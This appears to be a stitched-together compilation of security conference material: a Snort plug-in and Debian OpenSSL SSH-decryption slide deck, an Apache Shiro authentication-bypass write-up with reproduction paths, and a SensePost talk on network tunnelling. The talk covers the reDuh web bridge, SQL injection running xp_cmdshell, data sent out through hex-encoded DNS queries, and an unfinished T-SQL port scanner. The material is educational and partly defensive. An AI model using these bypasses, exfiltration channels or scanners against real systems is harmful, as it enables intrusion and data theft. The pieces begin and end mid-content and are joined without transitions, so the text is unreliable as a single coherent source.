/* holder for aho-corasick info */
NULL,
/* holder for byte representation of "NetBus" */
0,
/* holder for length of byte representation */
0
/* holder of increment length */
};
Snort Plug-in API
Content Matching
static RuleOption sid109option2 =
{
OPTION_TYPE_CONTENT,
{
&sid109content
}
};
ENGINE_LINKAGE int contentMatch(void *p, ContentInfo*
content, const u_int8_t **cursor);
Snort Plug-in API
Content Matching (Continued)
static PCREInfo activeXPCRE =
{
"<object|\snew\s+ActiveX(Object|Control)",
NULL,
NULL,
PCRE_CASELESS,
CONTENT_BUF_NORMALIZED
};
static RuleOption activeXPCREOption =
{
OPTION_TYPE_PCRE,
{
&activeXPCRE
}
};
Snort Plug-in API
PCRE Matching
ENGINE_LINKAGE int pcreMatch(void *p, PCREInfo* pcre,
const u_int8_t **cursor);
Snort Plug-in API
PCRE Matching (Continued)
static FlowFlags activeXFlowFlags = {
FLOW_ESTABLISHED|FLOW_TO_CLIENT
};
static RuleOption activeXFlowOption = {
OPTION_TYPE_FLOWFLAGS,
{
&activeXFlowFlags
}
};
ENGINE_LINKAGE int checkFlow(void *p, FlowFlags
*flowFlags);
Snort Plug-in API
Flow Matching
extern Rule sid109;
extern Rule sid637;
Rule *rules[] =
{
&sid109,
&sid637,
NULL
};
/* automatically handled by the dynamic rule framework */
ENGINE_LINKAGE int RegisterRules(Rule **rules);
Snort Plug-in API
Dynamically Registering Rules
•
Optional C packet processing callback
Returns RULE_MATCH or RULE_NOMATCH
sf_snort_plugin_api.h:
typedef int (*ruleEvalFunc)(void *);
typedef struct _Rule {
[…]
ruleEvalFunc evalFunc;
[…]
} Rule;
Snort Dynamic Rules
Implementation
my_dynamic_rule.c:
#include "sf_snort_plugin_api.h"
#include "sf_snort_packet.h"
int myRuleDetectionFunc(void *p);
Rule myRule = {
[…],
&myRuleDetectionFunc,
[…]
};
Snort Dynamic Rules
Implementation (2)
my_dynamic_rule.c (con't):
int myRuleDetectionFunc(void *p) {
SFSnortPacket *sp = (SFSnortPacket *) p;
if ((sp) && (sp->ip4_header.identifier % (u_int16_t)2))
return RULE_MATCH;
return RULE_NOMATCH;
}
•
Question for Audience: What does this do?
Snort Dynamic Rules
Implementation (3)
•
Another key header file: "sf_dynamic_preprocessor.h"
•
Key struct: "DynamicPreprocessorData"
Typically defined as extern variable named "_dpd"
•
Contains:
Functions to add callbacks for Init / Exit / Restart
Internal logging functions
Stream API
Search API
Alert functions
Snort Inline (IPS) functions
Snort Dynamic Preprocessors
Background
void SetupActiveX(void) {
_dpd.registerPreproc("activex", ActiveXInit);
}
static void ActiveXInit(char *args) {
_dpd.addPreproc(ProcessActiveX,
PRIORITY_TRANSPORT, PP_ACTIVEX);
}
static void ProcessActiveX(void* pkt, void* contextp) {
[…]
_dpd.alertAdd(GENERATOR_SPP_ACTIVEX,
ACTIVEX_EVENT_KILLBIT, 1, 0, 3,
ACTIVEX_EVENT_KILLBIT_STR, 0);
return;
}
Snort Dynamic Preprocessors
spp_activex.c
•
We can try calling rule option matching functions directly,
but need internal structures first properly initialized.
•
Use dummy Rule struct and ruleMatch():
ENGINE_LINKAGE int ruleMatch(void *p, Rule *rule);
•
RegisterOneRule(&rule, DONT_REGISTER_RULE);
•
Confusing, huh?
•
RegisterOneRule will setup Aho-Corasick and internal ptrs
•
But we don't always want to register the rules as an OTN
•
So, pass in DONT_REGISTER_RULE. See?
Snort Plug-in API
Using Rules Within a Dynamic Preprocessor
•
Available under:
http://www.secureworks.com/research/tools/snort-
plugins.html
•
Released under GPLv2 (or later)
•
No Support
•
No Warranty
•
Use at Your Own Risk
•
Feedback is appreciated!
SecureWorks Snort Plug-ins
•
Inspects web traffic for scripting instantiating "vulnerable"
ActiveX controls
As based on public vulnerability disclosures
•
Preprocessor configuration points to local DB of ActiveX
controls
Listed by CLSID and optionally method/property
XML format (I know, I know…)
•
Looks at traffic being returned from HTTP servers
ActiveX instantiation and Class ID
Access to ActiveX control's methods / properties
ActiveX Detection Dynamic Preprocessor
•
Can presently be bypassed
JavaScript obfuscation
HTTP encodings
But many attackers still using plain CLSID!
•
Future Snort Inline support
Drop or TCP RST the HTTP response
•
Leveraging of normalization done by HTTP Inspect
•
Enhance to use Unified2 extra data to log detected domain
name
ActiveX Detection Dynamic Preprocessor
Continued
•
Uses matchRule(Rule*) from Snort Plug-in API
Very convenient
Not the most efficient
•
Performs naïve linear search of CLSIDs
Enhance to reuse HTTP Inspect's high-performance
data-structures?
•
Uses Snort's flow match
•
Performs content matching and PCRE matching
ActiveX Detection Dynamic Preprocessor
Internals
Live Demo
ActiveX Detection Dynamic Preprocessor
•
Lack of sufficient entropy in PRNG delivered by Debian's
OpenSSL package
•
Go see Luciano Bello and Maximiliano Bertacchini's talk!
Saturday, 13:00 – 13:50, Track 4
•
One of the coolest vulns of 2008!
Pwnie for Mass 0wnage!
•
Keys generated since 2006-09-17
•
Keys generated with Debian Etch, Lenny or Sid
Downstream distros such as Ubuntu also vulnerable
Debian OpenSSL Predictable PRNG Vuln
CVE-2008-0166
Debian OpenSSL Predictable PRNG Vuln
Dilbert (source: H D Moore, metasploit.com)
Debian OpenSSL Predictable PRNG Vuln
XKCD (source: H D Moore, metasploit.com)
•
From the Debian Wiki (http://wiki.debian.org/SSLkeys):
•
"… any DSA key must be considered compromised if it has
been used on a machine with a ‘bad’ OpenSSL. Simply
using a ‘strong’ DSA key (i.e., generated with a ‘good’
OpenSSL) to make a connection from such a machine may
have compromised it. This is due to an ‘attack’ on DSA that
allows the secret key to be found it the nonce used in the
signature is known or reused.”
•
H D Moore was all over this one with a quickness!
Metasploit hosting lists of brute-forced 'weak' keys
Debian OpenSSL Predictable PRNG Vuln
It’s Bad!
•
You scanned your assets for SSH / SSL servers using the
blacklisted keys, right? (Tenable Nessus)
•
You scanned all user home dirs for blacklisted SSH keys?
Debian ssh-vulnkey tool
•
You scanned all user homedirs, Windows Protected
Storage, and browser profiles for blacklisted SSL certs,
right?
•
But what about connections to external servers that use
the vulnerable Debian OpenSSL?
Debian OpenSSL Predictable PRNG Vuln
Detection & Mitigation
•
Goal: Detect SSH Diffie-Hellman Key Exchange (KEX)
where client and/or server are OpenSSH linked against
vulnerable Debian OpenSSL
•
Just that detective capability is valuable
Even w/ great technical controls in place, you're likely
missing:
• Users connecting to external servers using bad
OpenSSL
• Connections to/from external hosts that use bad
OpenSSL
•
What else can we do?
Debian OpenSSL Predictable PRNG Preproc.
•
Goal: Have preprocessor(s) "normalize" traffic by brute-
forcing the DH key exchange, decoding both sides of
session on-the-fly.
Snort rule matching engine and other preprocessors can
then inspect unencrypted session
Unencrypted sessions can be logged (Unified or PCAP)
•
Potential issue w/ source code release
Controls on the export of cryptanalytic software (US)
Debian OpenSSL Predictable PRNG Preproc.
Continued
•
Alexander Klink
http://seclists.org/fulldisclosure/2008/May/0592.html
http://www.cynops.de/download/check_weak_dh_ssh.pl
.bz2
•
Paolo Abeni, Luciano Bello & Maximiliano Bertacchini
Wireshark patch to break PFS in SSL/TLS
https://bugs.wireshark.org/bugzilla/show_bug.cgi?
id=2725
•
Raphaël Rigo & Yoann Guillot
New work on SSH and Debian OpenSSL PRNG Vuln
Unknown to me until hearing about it at DEFCON
http://www.cr0.org/progs/sshfun/
Debian OpenSSL Predictable PRNG Preproc.
Credits
•
A way for two parties to agree on a random shared secret
over an insecure channel.
•
Server sends to Client
p – large prime number
g – generator of the field (Zp)* (typically 0x02)
•
Client generates random number a
Calculates g^a mod p
Sends calculated value to server
•
Server generates random number b
Calculates g^b mod p
Sends calculated value to client
Diffie-Hellman Key Exchange for SSH
Do the Math!
•
The DH shared secret is a function of both a and b, so only parties that know a or b can calculate it.
•
Client
knows g, a and g^b mod p
Calculates shared secret as (g^b)^a = g^ab mod p
•
Server
knows g, b and g^a mod p
Calculates shared secret as (g^a)^b = g^ab mod p
Diffie-Hellman Key Exchange for SSH
Do the Math! (2)
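The client and server computations above can be checked directly with `java.math.BigInteger`. Toy-sized parameters are used purely for illustration; real SSH DH groups use primes of 1024 bits or more:

```java
import java.math.BigInteger;
import java.security.SecureRandom;

public class DhSketch {
    public static void main(String[] args) {
        // Toy parameters: 2^31 - 1 is prime, and 7 is a primitive root mod it.
        BigInteger p = BigInteger.valueOf(2147483647L);
        BigInteger g = BigInteger.valueOf(7);
        SecureRandom rnd = new SecureRandom();

        BigInteger a = new BigInteger(24, rnd);    // client's secret exponent
        BigInteger b = new BigInteger(24, rnd);    // server's secret exponent
        BigInteger ga = g.modPow(a, p);            // sent client -> server
        BigInteger gb = g.modPow(b, p);            // sent server -> client

        BigInteger clientSecret = gb.modPow(a, p); // (g^b)^a mod p
        BigInteger serverSecret = ga.modPow(b, p); // (g^a)^b mod p
        System.out.println(clientSecret.equals(serverSecret)); // prints true
    }
}
```

Both sides always arrive at the same value, since (g^b)^a = (g^a)^b = g^ab mod p.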
•
Eavesdropper knows g, g^a mod p and g^b mod p
•
Can't calculate g^ab mod p from g^a mod p and g^b mod p
•
Must solve the discrete logarithm problem
No known (non-quantum) algorithm to solve in
polynomial time
Polynomial-Time Algorithms for Prime Factorization and
Discrete Logarithms on a Quantum Computer
Peter W. Shor, AT&T Research
30 August 1995, Revised 25 January 1996
arXiv:quant-ph/9508027v2
Diffie-Hellman Key Exchange for SSH
Do the Math! (3)
•
Encryption IVs and Keys generated from DH shared secret
•
VC, VS – Client / Server's SSH version announce string
•
IC, IS – Client / Server's SSH_MSG_KEXINIT message
•
KS – Server's Public Host Key
•
H = hash(VC || VS || IC || IS || KS || g^a mod p || g^b mod p || g^ab mod p)
•
SSH session_id = H of initial DH key exchange
•
IV client to server: hash(g^ab mod p || H || "A" || session_id)
•
IV server to client: hash(g^ab mod p || H || "B" || session_id)
•
Enc Key client to server: hash(g^ab mod p || H || "C" || session_id)
•
Enc Key server to client: hash(g^ab mod p || H || "D" || session_id)
Diffie-Hellman Key Exchange for SSH
Do the Math! (4)
•
If OpenSSH client or server is linked against vulnerable
Debian OpenSSL
a or b is completely predictable based on ProcessID of
OpenSSH
•
We can quickly brute force a or b.
Only 32768 possibilities!
•
If we know a or b, we can calculate DH shared secret
g^ab mod p = (g^b)^a = (g^a)^b
•
Once we know the DH shared secret, we have everything
needed to decrypt the SSH session layer!
The Debian OpenSSL PRNG and SSH DH GEX
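The brute force described above works because one exponent is drawn from a tiny space (32768 possible PRNG states). A generic toy illustration of the search — this does not reconstruct the actual Debian OpenSSL PRNG, it just shows why a small exponent space is fatal:

```java
import java.math.BigInteger;

public class WeakDhBruteForce {
    // Recover the secret exponent a from an observed g^a mod p by exhaustive
    // search over a small candidate space (a stand-in for the 32768 PID-derived
    // Debian PRNG states). Returns -1 if no candidate matches.
    static long recover(BigInteger g, BigInteger p, BigInteger observedGa, int space) {
        for (long a = 0; a < space; a++) {
            if (g.modPow(BigInteger.valueOf(a), p).equals(observedGa)) return a;
        }
        return -1;
    }

    public static void main(String[] args) {
        // 2^31 - 1 is prime; 7 is a primitive root mod it, so g^a is unique
        // for every a below 32768 and the search has exactly one answer.
        BigInteger p = BigInteger.valueOf(2147483647L);
        BigInteger g = BigInteger.valueOf(7);
        long secret = 31337;                           // "predictable" exponent
        BigInteger ga = g.modPow(BigInteger.valueOf(secret), p);
        System.out.println(recover(g, p, ga, 32768));  // prints 31337
    }
}
```

With a recovered, the observer computes the shared secret as (g^b)^a mod p and derives the session IVs and keys exactly as the legitimate peers do.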
•
Tunneled Clear Text Passwords are compromised
…if either client or server is using vulnerable OpenSSL
RSA / DSA public key authentication is not affected
•
Files or other data protected by SSH Session layer are
compromised
•
…if either client or server is using vulnerable OpenSSL
•
Observers can easily tell if either client or server is using
vulnerable OpenSSL
…and proceed to decrypt the stream
The Debian OpenSSL PRNG and SSH DH GEX
The Impact
Live Demo
Detection of SSH Diffie-Hellman KEX using
vulnerable Debian OpenSSL
•
Snort v3
Complete redesign from the ground up
Extremely flexible and extensible architecture
Snort 2.8.x matching engine plugs in as module
HW optimized packet acquisition can be plugged in
Lua programming language!
•
Snort 2.8.3 (Release Candidate)
Enhancements to HTTP Inspect
• Normalized Buffers for Method, URI, Headers,
Cookies, Body
• Content and PCRE matching against new buffers
New HTTP normalization exposed in Snort Plug-in API
Snort Futures
•
Snort is a powerful framework to work with
APIs for alerting, logging, Streams, matching
Why reinvent the wheel?
•
Hopefully, you can take away needed info to start writing
your own plug-ins.
•
Read the source code of other plug-ins, ask questions.
•
Snort v2 is still evolving. If the APIs don't support
something you (and potentially others?) really need, ask
and ye may receive.
Wrapping It All Up
Thanks to DT, the Goons
and everyone who made
DEFCON a reality this year!
Greetz to DC404, Atlanta's DC Group!
Speakers: dr.kaos, Carric, David Maynor, Scott Moulton
& Adam Bregenzer
And our very own Goon, dc0de!
Questions?
[email protected]
Shiro Permission Bypass
Environment Setup
Source code address
It can be downloaded with a GitHub downloader.
CVE-2020-1957
Code Configuration
Authentication setup
package org.javaboy.shirobasic;
import org.apache.shiro.mgt.SecurityManager;
import org.apache.shiro.spring.web.ShiroFilterFactoryBean;
import org.apache.shiro.web.mgt.DefaultWebSecurityManager;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import java.util.LinkedHashMap;
import java.util.Map;
/**
* @Author 江南一点雨
* @Site www.javaboy.org 2019-06-05 11:16
*
* Shiro is configured here.
* The Shiro configuration mainly involves 3 Beans:
*
* 1. First, provide a Realm instance
* 2. Configure a SecurityManager and set the Realm on it
* 3. Configure a ShiroFilterFactoryBean and specify the path interception rules on it
*/
@Configuration
public class ShiroConfig {
@Bean
MyRealm myRealm() {
return new MyRealm();
}
@Bean
SecurityManager securityManager() {
DefaultWebSecurityManager manager = new DefaultWebSecurityManager();
manager.setRealm(myRealm());
return manager;
}
@Bean
ShiroFilterFactoryBean shiroFilterFactoryBean() {
ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean();
// specify the SecurityManager
bean.setSecurityManager(securityManager());
// login page
bean.setLoginUrl("/login");
// page shown after successful login
bean.setSuccessUrl("/index");
// page to redirect to when an unauthorized path is accessed
bean.setUnauthorizedUrl("/unauthorizedurl");
// configure the path interception rules; note that order matters
Map<String, String> map = new LinkedHashMap<>();
map.put("/doLogin", "anon");
map.put("/hello/*","authc");
//map.put("/**", "authc");
bean.setFilterChainDefinitionMap(map);
return bean;
}
}
Controller code

package org.javaboy.shirobasic;
import org.apache.shiro.SecurityUtils;
import org.apache.shiro.authc.AuthenticationException;
import org.apache.shiro.authc.UsernamePasswordToken;
import org.apache.shiro.subject.Subject;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RestController;
/**
* @Author 江南一点雨
* @Site www.javaboy.org 2019-06-05 11:24
*/
@RestController
public class LoginController {
@PostMapping("/doLogin")
public void doLogin(String username, String password) {
Subject subject = SecurityUtils.getSubject();
try {
subject.login(new UsernamePasswordToken(username, password));
System.out.println("登录成功!");
} catch (AuthenticationException e) {
e.printStackTrace();
System.out.println("登录失败!");
}
}
@GetMapping("/hello")
public String hello() {
return "hello";
}
@GetMapping("/login")
public String login() {
return "please login!";
}
@GetMapping("/hello/{currentPage}")
public String hello(@PathVariable Integer currentPage) {
return "hello" + currentPage.toString();
}
}
Vulnerability Reproduction
1. Accessing the /hello/1 endpoint requires authentication; the request is redirected straight to the login page.
2. Permission bypass: /hello/1/
Vulnerability Analysis
Root Cause
PathMatchingFilterChainResolver#getChain() matches the incoming URL against the URL path expressions configured for the filter chains, deciding whether an interceptor applies; on a successful match it returns the corresponding filter chain so that ShiroFilter can enforce the permission checks.
The matching between a URL path expression and the incoming URL is done mainly by the pathMatches function. Search for this method globally (in IDEA, double-press Shift to search everywhere, including jar files).
It first obtains the filterChains and compares the requestURI against each filterChain, entering the this.pathMatches method. this.getPathMatcher() returns an AntPathMatcher object, and after a chain of calls execution finally reaches the AntPathMatcher.doMatch method.
The earlier comparisons behave identically for both kinds of path; the key is in the return value. If the pattern does not end with /, the method returns !path.endsWith("/"). As a result, /hello/1 yields true while /hello/1/ yields false. When the return value is false, the do-while loop does not terminate: it checks whether there is another filter, and when no filter is left it returns null.
Fix
When configuring the filter, write the pattern in the /hello/** form, and check that the URL does not end with /.
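The trailing-slash behavior described above can be modelled in a few lines. This is a simplified Python sketch, not Shiro's actual AntPathMatcher source; only the final endsWith comparison from the analysis is reproduced, and the earlier segment comparisons are assumed to have passed (as they do for the /hello/* example).

```python
def ant_tail_matches(pattern: str, path: str) -> bool:
    """Model only the last step of AntPathMatcher.doMatch():
    when the pattern does not end with '/', the result is
    'not path.endswith("/")'. All earlier segment comparisons
    are assumed successful, as in the /hello/* case."""
    if not pattern.endswith("/"):
        return not path.endswith("/")
    return True

# /hello/* guards /hello/1 ...
assert ant_tail_matches("/hello/*", "/hello/1") is True
# ... but a trailing slash makes the match fail, so no filter
# chain is selected and the request goes through unauthenticated:
assert ant_tail_matches("/hello/*", "/hello/1/") is False
```

This is exactly why the recommended /hello/** pattern (or rejecting /-terminated URLs) closes the hole.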
CVE-2020-11989
Code Configuration
Version < 1.5.2; the application is accessed through a virtual path: http://localhost:8089/.;/shiro/admin/page (see the referenced article)
Authentication configuration
package org.syclover.srpingbootshiro;
import org.apache.shiro.spring.web.ShiroFilterFactoryBean;
import org.apache.shiro.web.mgt.DefaultWebSecurityManager;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import java.util.LinkedHashMap;
import java.util.Map;
@Configuration
public class ShiroConfig {
@Bean
MyRealm myRealm() {
return new MyRealm();
}
@Bean
DefaultWebSecurityManager securityManager(){
DefaultWebSecurityManager manager = new DefaultWebSecurityManager();
manager.setRealm(myRealm());
return manager;
}
@Bean
ShiroFilterFactoryBean shiroFilterFactoryBean(){
ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean();
bean.setSecurityManager(securityManager());
bean.setLoginUrl("/login");
bean.setSuccessUrl("/index");
bean.setUnauthorizedUrl("/unauthorizedurl");
Map<String, String> map = new LinkedHashMap<>();
map.put("/doLogin", "anon");
map.put("/admin/*", "authc");
bean.setFilterChainDefinitionMap(map);
return bean;
}
}
Controller configuration

package org.syclover.srpingbootshiro;
import org.apache.shiro.SecurityUtils;
import org.apache.shiro.authc.AuthenticationException;
import org.apache.shiro.authc.UsernamePasswordToken;
import org.apache.shiro.subject.Subject;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RestController;
@RestController
public class LoginController {
@PostMapping("/doLogin")
public void doLogin(String username, String password) {
Subject subject = SecurityUtils.getSubject();
try {
subject.login(new UsernamePasswordToken(username, password));
System.out.println("success");
} catch (AuthenticationException e) {
e.printStackTrace();
System.out.println("failed");
}
}
@GetMapping("/admin/page")
public String admin() {
return "admin page";
}
@GetMapping("/login")
public String login() {
return "please login!";
}
}
Vulnerability Reproduction
Vulnerability Analysis
First, the issue described above has clearly been fixed.
Testing shows that a normal request and a bypass request produce different requestURI values (the bypass yields /), so the focus falls on the this.getPathWithinApplication() method.
Normal request
Bypass request
The problem lies in the decodeAndCleanUriString method: it truncates the URL at the ; and discards everything after the semicolon, so the resulting URL path ends up as /.
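The truncation step can be modelled in a couple of lines. This is a simplified Python sketch, not Shiro's actual source; per the analysis above, the later path normalization reduces the leftover "/." to "/".

```python
def decode_and_clean(uri: str) -> str:
    """Simplified model of decodeAndCleanUriString: cut the URI
    at the first ';' and discard everything after it."""
    semi = uri.find(";")
    return uri[:semi] if semi != -1 else uri

# The ".;" trick leaves only "/." behind, so the /admin/* filter
# never sees the real /shiro/admin/page path.
assert decode_and_clean("/.;/shiro/admin/page") == "/."
assert decode_and_clean("/admin/page") == "/admin/page"
```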
With versus without a configured virtual path
In these two cases, when no virtual path is configured, valueOrEmpty(request.getContextPath()) evaluates to empty and the final path returned is simply the request path.
CVE-2020-11989 (Xuanwu Lab)
Description
This bypass builds on the fact that Shiro URL-decodes the requestURI when obtaining it; double encoding is used to slip past the check (see the referenced article).
Vulnerability environment
package org.syclover.srpingbootshiro;
import org.apache.shiro.SecurityUtils;
import org.apache.shiro.authc.AuthenticationException;
import org.apache.shiro.authc.UsernamePasswordToken;
import org.apache.shiro.subject.Subject;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RestController;
@RestController
public class LoginController {
@PostMapping("/doLogin")
public void doLogin(String username, String password) {
Subject subject = SecurityUtils.getSubject();
try {
subject.login(new UsernamePasswordToken(username, password));
System.out.println("success");
} catch (AuthenticationException e) {
e.printStackTrace();
System.out.println("failed");
}
}
@GetMapping("/admin/{name}")
public String hello(@PathVariable String name) {
return "hello"+ name;
}
}
Vulnerability Reproduction
%25%32%66->%2f->/
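The decode chain above can be reproduced with the standard library. Illustrative only: the first decode is performed by the container, the second by Shiro.

```python
from urllib.parse import unquote

payload = "%25%32%66"      # double-encoded "/"
once = unquote(payload)    # first decode (by the servlet container)
twice = unquote(once)      # second decode (by Shiro)
assert once == "%2f"
assert twice == "/"
```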
Vulnerability Analysis
Pushing a Camel through the
eye of the Needle!
[Funneling Data in and out of Protected Networks]
SensePost 2008
About:us
• SensePost
– Specialist Security firm based in South Africa;
– Customers all over the globe;
– Talks / Papers / Books
• {marco,haroon}@sensepost.com
– Spend most of our time breaking stuff
((thinking about breaking stuff) or playing
foosball!)
• What this talk is about ? (Hint: not foosball!)
What this talk is about?
A progression of Attacks
• A brief trip to the past (1601-1990)
• Un-firewalled access to victim host
• And also un-firewalled to rest of the
network!
History (Continued.)
• The Introduction of firewalls..
• The failure to filter outbound traffic (circa
2000)
• CommandExec.[asp|jsp|php|*]
{The need for a comfortable Channel}
History (Continued.)
• Creating binaries on remote victim.
• debug.exe and friends
• upload.asp (and friends)
• Win32 Port Binding (1998)
Remote Exec (with feeling!)
• We really needed to use the words AJAX
and XMLHttpRequest object to qualify as
a web 2.0 talk.
• We will still add XML, SOAP and a tool
with no vowels in its name (watch for this!)
Time to pivot™
• This stuff is ancient history.
• Sp_quickkill
• Extreme nc usage
• SensePost tcpr / Foundstonefport (Circa 2000)
Client
Pivot
Target
Start tcpr
• XP and IPV6!
• Ssh tunnel
Listens on port
55555
Connects to
pivot:55555
Pivot connects to
target
Proxied connection between client and target
SSH Tunnels (a)
Client
Pivot
Target
Listens on
port 22
Pivot runs sshd
ssh –L
55555:pivot:25
Proxied connection from Client to Target port
Listens on
port 55555
Listens on
port 25
SSH Tunnels (b)
• Instead lets look at –R
• So all we need is an ssh client on the
remote machine, an SSHD on one of ours
and we are in the game!
• putty + plink FTW!
Local
machine
Client is
the Pivot
Target
Listens on
port 22
ssh –R
55555:localmachin
e:445
Target runs sshd
Listens on
port 445
Proxy connection from target:55555 to local machine:445
Listens on
port 55555
Interlude (dns2tcp)
• Available from:
http://www.hsc.fr/ressources/outils/dns2tcp
/
• Perfect for homes away form home
• Perfect for stealing wifi access
A good marriage (sshtun +
dnstun)
Layer 2 bridges
• If you aren’t going to the network, bring
the network to you
• If you’re bridging the network, make it
protocol independent
• Requires inbound or outbound connection
ability
Layer 2 bridges
• Pros
– Clean interface to network
– Not port or connection dependent, protocol
independent
– Simple to setup and use
• Cons
– Death by firewall
– Requires external deps (pcap,libnet)
• Examples
– Tratt by Olleb (www.toolcrypt.org)
– MyNetwork by Greg Hoglund (www.rootkit.com)
A Brief Recap
• We used to be able to hit everything we
wanted to.
• We were happily redirecting traffic when
firewalls were more forgiving
• Outbound Access Made us amazingly
happy.
• Network level bridging was cool but the
rules are changing..
• Can we do this completely over HTTP /
HTTPS?
Introducing glenn.jsp
• (Working title)
a)We can hit our target on port 80 (or 443)
b)Ability to upload / create a web page on
the target [example: JMX Console]
c)Network level filtering is tight.
d)Possible reverse proxies in-between
• [a],[b],[c],[d] meet [one smart intern]
ReDuh.jsp
•
Written by Glenn Wilkinson ([email protected])
•
Upload / Create .JSP page on server
•
Fire-up local proxy (localhost:1234)
•
Tell web-page to create web-bridge to internal_host:3389
– JSP creates socket to internal_host:3389
– JSP creates queues to handle internal comms.
•
Attacker aims RDC client at local proxy on 127.0.0.1:1234
– Local endpoint accepts traffic, converts packets to base-64
encoded POST messages.
– Packets are POSTed to .JSP page
•
JSP Page decodes packets, queues for delivery via created
socket.
– Return traffic is queued, encoded as base64 and queued again.
•
Proxy polls server for return packet data, recreates them as
packets and re-feeds the local socket.
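The encode/decode legs of this relay can be sketched as below. This is not reDuh's actual wire format; the chunk size and helper names are invented for illustration of the base64-over-POST idea.

```python
import base64

def packets_to_post_body(data: bytes, chunk: int = 48) -> list[str]:
    """Split a raw TCP payload into chunks and base64-encode each,
    the way a reDuh-style local proxy turns socket bytes into
    POSTable fields (format invented for this sketch)."""
    return [
        base64.b64encode(data[i:i + chunk]).decode("ascii")
        for i in range(0, len(data), chunk)
    ]

def post_body_to_packets(lines: list[str]) -> bytes:
    """Reverse step performed by the server-side page before it
    queues the bytes for delivery on the internal socket."""
    return b"".join(base64.b64decode(line) for line in lines)

payload = bytes(range(200))
assert post_body_to_packets(packets_to_post_body(payload)) == payload
```

The return direction works the same way: the page base64-encodes queued socket data, and the local proxy polls for it and re-feeds the local socket.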
What this means..
• We have a simple TCP over HTTP/HTTPS
implementation
• It requires the creation of a simple, single
.JSP file on the target..
• Surely this isn’t .JSP specific ?
• [email protected] ported this while
cursing a lot to ASP.net
• [email protected] gave us the php
version.
• Basically covers most of the common
cases.. If we can create a web page, we can
create a circuit..
Squeeza
• Released at BH USA 2007
• Advanced SQL injection tool (another one on
the pile…), aimed at MS SQL
• Treated injection slightly differently
• Split content generation from return channel
– Content generation
– Supported multiple return channels
• Could mostly mix ‘n match content
generation modes with return channels
Squeeza
• Content created (not the interesting part)
– Command execution: xp_cmdshell (old faithful)
– Data extraction: select name from sysobjects where
xtype=‘U’
– File download: bulk insert … from ‘c:\blah.txt’
• Return channels (more interesting part)
– DNS
– Timing
– HTTP Error-based (ala Automagic SQL Injector)
• Return channels NOT supported
– Inline HTML extraction
– Standard blind injection techniques
Squeeza process overview
Generate content using command execution, file copy or
data extraction injection string
Store data in a temporary table inside SQL database
Extract data using return channel of choice: DNS, timing,
SQL error messages
Not fast enough for real-time applications, but
good enough for batch applications such as
command execution, file copy etc. Don’t
expect to relay VNC traffic.
Squeeza: DNS
•
Weaponised SQL server content extraction through DNS
queries
•
Data broken up into chunks, encoded and emitted through
DNS
•
Which meant:
– Entire DNS channel handled in SQL
– Elevated privs not required (but used if available)
– Provided reliability guarantees, since client had complete
control over what was requested and received
•
Compare to SQLNinja (awesome tool, DNS not so much)
– requires binary upload+cmd execution
– reliability guarantee is ‘try again’, as client can’t control
remote binary
Temp table
Attacker
Victim
WWW/SQL
Server
exec xp_cmdshell ‘ipconfig /all’
Basic setup: attacker has SQL injection vulnerability into SQL server, as
‘sa’
Command is run on SQL server
Output is produced
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.0.47
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.2
Output is stored in DB
Second injection string
Grab limited chunk of data from temporary table, convert to hex, tack on
domain
57696e646f777320495020436f6e66696775726174696f6e.sensepost.com
Windows IP Configuration
Initiate DNS request with encoded data
Attacker
DNS Server
57696e646f777320495020436f6e66696775726174696f6e.sensepost.com
Request is received and converted into original form
Windows IP Configuration
Squeeza: timing
• Weaponised SQL server content
extraction through timing attacks
• Data broken up into chunks, bits
extracted one at a time through timing
differences
• Which meant:
– Didn’t need an explicit return channel
– Not absolutely reliable, but good enough
– Many cups of coffee
Profiling SQL servers
• We want to know which SQL server version we’re
dealing with
• Features added and removed between releases
– 2000 added ????
– 2005 removed xp_execresultset
– 2005 added stored procedure creation functionality
• Common problem with a number of solutions
– select @@version, choose return channel
• What about other methods?
– Look for new/removed tables/stored procs/users
– Look for new SQL syntax
Squeeza future
• Seems too nice to forget
• Not enough uptake
• Maybe piggyback onto Metasploit??
• What would this require?
This OLE’ thing
•
In 2002, Chris Anley’s paper discussed OLE object
instantiation and execution from T-SQL
– Demo’ed file reading/writing, shell execution
– Maybe this got lost in the rest of the goodness
•
How many SQL injection tools ignore OLE attacks?
– ???????????
•
Is it because of privs?
– Hmmmmm, sp_oacreate, sp_oamethod require execute on
those methods
•
Complexity?
– Regular injections used by other tools create/execute stored
procs all the time
•
Payload size?
– Again, current tools are no super packers
Growing OLE’ together
• In 6 years, not much has changed
• We can still use OLE objects (another
route for ActiveX object exploitation?)
• Why this route?
– Safe for scripting
– Killbits
• We think OLE integration deserves much
more focus in injection payloads
Something OLE’, something
new
Example of a usable new OLE payload
SQL-based port scanner
SQL port scanner
• Basis is “MSXML2.ServerXMLHTTP”
object
• Used to retrieve XML data from a
webserver
• Installed with IE, IIS,????
– Two versions on win2k3
• We can specify then IP:port of the target
webserver
• Return values differ depending on
whether a webserver is listening or not
SQL port scanner
• We can tell if ports are open or
closed/filtered
• Even better, basic protocol fingerprinting
since we’re also told if a legitimate
webserver answered
• But how to differentiate between closed
and filtered?
• Same way everyone else does (mostly)
– Timing and timeouts
– setTimeouts
probeip(ip, port)
CREATE PROCEDURE probeip @host VARCHAR(50), @port VARCHAR(5) AS
BEGIN
  DECLARE @o INT, @rop INT, @rse INT, @status INT, @s varchar(60)
  SET @s = 'http://' + @host + ':' + @port + '/'
  EXEC sp_OACreate 'MSXML2.ServerXMLHTTP', @o OUT
  EXEC @rop = sp_OAMethod @o, 'setTimeouts', NULL, 3000, 3000, 3000, 3000
  EXEC @rop = sp_OAMethod @o, 'open', NULL, 'GET', @s
  EXEC @rse = sp_OAMethod @o, 'send'
